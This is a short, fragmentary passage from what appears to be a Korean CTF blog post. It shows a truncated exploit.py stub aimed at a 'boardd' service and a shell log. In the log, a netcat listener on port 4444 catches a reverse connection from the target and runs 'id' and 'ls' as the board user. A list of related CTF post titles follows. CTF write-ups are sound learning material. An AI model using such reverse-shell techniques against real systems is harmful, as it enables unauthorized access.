exploit.py |
#!/usr/bin/python from socket import * def pack(data): HOST = "192.168.123.129" for i in range(0 , 0x10000): |
[pwn3r@localhost board]$ ./exploit.py & nc -lv 4444 [1] 17276 Connection from 192.168.123.129 port 4444 [tcp/krb524] accepted id uid=1010(board) gid=1010(board) groups=1010(board) ls -l total 36 -rwxr-xr-x 1 board board 14892 Sep 18 11:24 boardd drwx------ 2 board board 512 Sep 18 12:09 free |
'CTF' 카테고리의 다른 글
Defcon 19th CTF Quals - Retro Revisted 200 (0) | 2011.09.25 |
---|---|
Defcon 19th CTF Quals - Retro Revisted 300 (0) | 2011.09.23 |
ISEC 2010 본선 CTF - hks (0) | 2011.09.17 |
Defcon 19th CTF 2011 Quals - Potent Pwnables 100 (0) | 2011.09.11 |
2010 순천향대 정보보호 페스티벌 level9 (0) | 2011.09.11 |